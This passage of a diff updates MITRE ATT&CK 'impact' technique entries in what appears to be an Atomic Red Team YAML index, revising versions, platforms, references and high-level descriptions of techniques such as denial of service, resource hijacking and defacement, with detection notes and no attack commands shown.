-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -58670,36 +59434,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -58708,11 +59463,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -58721,17 +59482,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -58740,6 +59515,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -58755,17 +59531,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -58775,14 +59546,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -58791,28 +59563,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -58823,7 +59595,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -58834,17 +59605,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -58881,7 +59647,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -58902,7 +59669,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -58929,12 +59696,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -58967,7 +59800,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -58977,10 +59810,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -59043,7 +59875,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -59084,7 +59915,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -59105,9 +59936,157 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests: []
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -59160,11 +60139,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -59187,6 +60165,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -59204,9 +60183,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -59232,9 +60212,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests:
     - name: Azure AD - Delete user via Azure AD PowerShell
@@ -59390,7 +60369,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -59414,12 +60393,11 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests: []
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -59438,7 +60416,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -59455,18 +60432,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -59490,8 +60462,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -59511,33 +60483,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
